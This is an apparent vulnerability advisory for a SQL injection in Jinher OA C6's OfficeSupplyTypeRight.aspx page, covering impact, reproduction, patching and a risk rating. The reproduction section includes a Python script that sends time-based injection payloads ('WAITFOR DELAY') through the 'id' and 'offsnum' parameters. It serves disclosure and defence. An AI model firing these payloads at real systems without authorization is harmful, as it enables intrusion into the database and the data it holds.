Jinher OA C6 SQL Injection Vulnerability in OfficeSupplyTypeRight.aspx

Vulnerability

A SQL injection vulnerability has been identified in Jinher OA C6 versions prior to 20260210. The issue lies in the OfficeSupplyTypeRight.aspx page, where the user-controlled GET parameters 'id' and 'offsnum' reach a SQL query without proper validation or parameterization, allowing an attacker to inject and execute arbitrary SQL statements. The vulnerability is exploitable remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows an attacker to execute attacker-controlled SQL against the OA database. This can lead to unauthorized reading of data, modification or deletion of data, and, depending on the privileges of the database account the application uses and the features of the database engine, execution of commands on the database server.

Reproduction

To reproduce this vulnerability, send a GET request to the OfficeSupplyTypeRight.aspx endpoint with the 'id' and 'offsnum' parameters, placing a crafted SQL payload in one parameter at a time while keeping the other benign. Because the page does not necessarily echo query results, the simplest indicator is timing: a payload that asks the database to pause should make the response arrive later than an unmodified request by roughly the requested delay. Measure a baseline first and repeat each probe several times so that network jitter or a generally slow server is not mistaken for a successful injection.
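The following script is an added example of the timing check described above; it is not code from the advisory or from the public exploit it mentions. The base URL and path, the Microsoft SQL Server backend (and therefore the WAITFOR DELAY syntax), the numeric context of the injected value, and the delay/tolerance figures are all assumptions. It probes one parameter at a time, compares the probe's median latency against both a benign baseline and a zero-delay control probe that uses the same syntax, and only reports a hit when the extra latency is explained by the requested delay rather than by the server choking on the payload.

```python
"""Time-based SQL injection check for OfficeSupplyTypeRight.aspx (added example).

Assumptions not taken from the advisory: MSSQL backend (WAITFOR DELAY),
numeric context for the injected value, the default URL below, and the
delay/tolerance values.
"""
import statistics
import sys
import time
import urllib.parse
import urllib.request

DELAY_SECONDS = 5   # pause requested from the database
SAMPLES = 3         # repeat each probe to smooth out network jitter
BENIGN = {"id": "1", "offsnum": "1"}   # assumed harmless values for both parameters


def delay_payload(seconds: int) -> str:
    """Assumed MSSQL payload for a numeric context; seconds=0 is the control."""
    return f"1;WAITFOR DELAY '0:0:{seconds}'--"


def build_probe_url(base_url: str, param: str, value: str) -> str:
    """Set `param` to `value` and leave the other parameter benign."""
    params = dict(BENIGN)
    params[param] = value
    return base_url + "?" + urllib.parse.urlencode(params)


def timed_get(url: str, timeout: float) -> float:
    """Seconds until the response (or error) arrives; a 500 after 5 s still counts."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            resp.read()
    except Exception:
        pass
    return time.monotonic() - start


def delay_detected(baseline, control, probed, expected_delay: float,
                   tolerance: float = 0.8) -> bool:
    """True when the delay probe is slower than both the benign baseline and the
    zero-delay control by at least tolerance * expected_delay. Medians are used
    so a single slow request neither masks nor fakes a result; the control
    rules out the server simply being slow on any injected syntax."""
    if not baseline or not control or not probed:
        return False
    needed = tolerance * expected_delay
    probe_med = statistics.median(probed)
    return (probe_med - statistics.median(baseline) >= needed and
            probe_med - statistics.median(control) >= needed)


def check_parameter(base_url: str, param: str,
                    expected_delay: int = DELAY_SECONDS, samples: int = SAMPLES):
    """Probe one parameter; returns (hit, baseline_times, control_times, probe_times)."""
    timeout = expected_delay * 3 + 5
    urls = {
        "baseline": build_probe_url(base_url, param, BENIGN[param]),
        "control": build_probe_url(base_url, param, delay_payload(0)),
        "probe": build_probe_url(base_url, param, delay_payload(expected_delay)),
    }
    times = {k: [timed_get(u, timeout) for _ in range(samples)] for k, u in urls.items()}
    hit = delay_detected(times["baseline"], times["control"], times["probe"], expected_delay)
    return hit, times["baseline"], times["control"], times["probe"]


if __name__ == "__main__":
    # Assumed default location; pass the real URL as the first argument.
    base = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1/OfficeSupplyTypeRight.aspx"
    for p in ("id", "offsnum"):
        hit, b, c, pr = check_parameter(base, p)
        fmt = lambda xs: [round(x, 2) for x in xs]
        print(f"{p}: {'DELAYED' if hit else 'no delay'} "
              f"baseline={fmt(b)} control={fmt(c)} probe={fmt(pr)}")
```

Run it only against systems you are authorized to test. If the backend turns out not to be MSSQL, swap `delay_payload` for the engine's sleep function; the comparison logic does not change.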

Remediation

Users are advised to apply the vendor patch; builds from 20260210 onward are reported as not affected. Until the patch is deployed, restrict network access to the OA application where possible. The underlying fix on the application side is to pass 'id' and 'offsnum' to the database through parameterized queries rather than building the SQL statement from the raw request values.

Added: Feb 23, 2026, 1:19 AM
Updated: Feb 23, 2026, 1:19 AM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 3.8
exploitability: 8.7
remediation: 0.0
relevance: 3.5
threat: 6.4
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.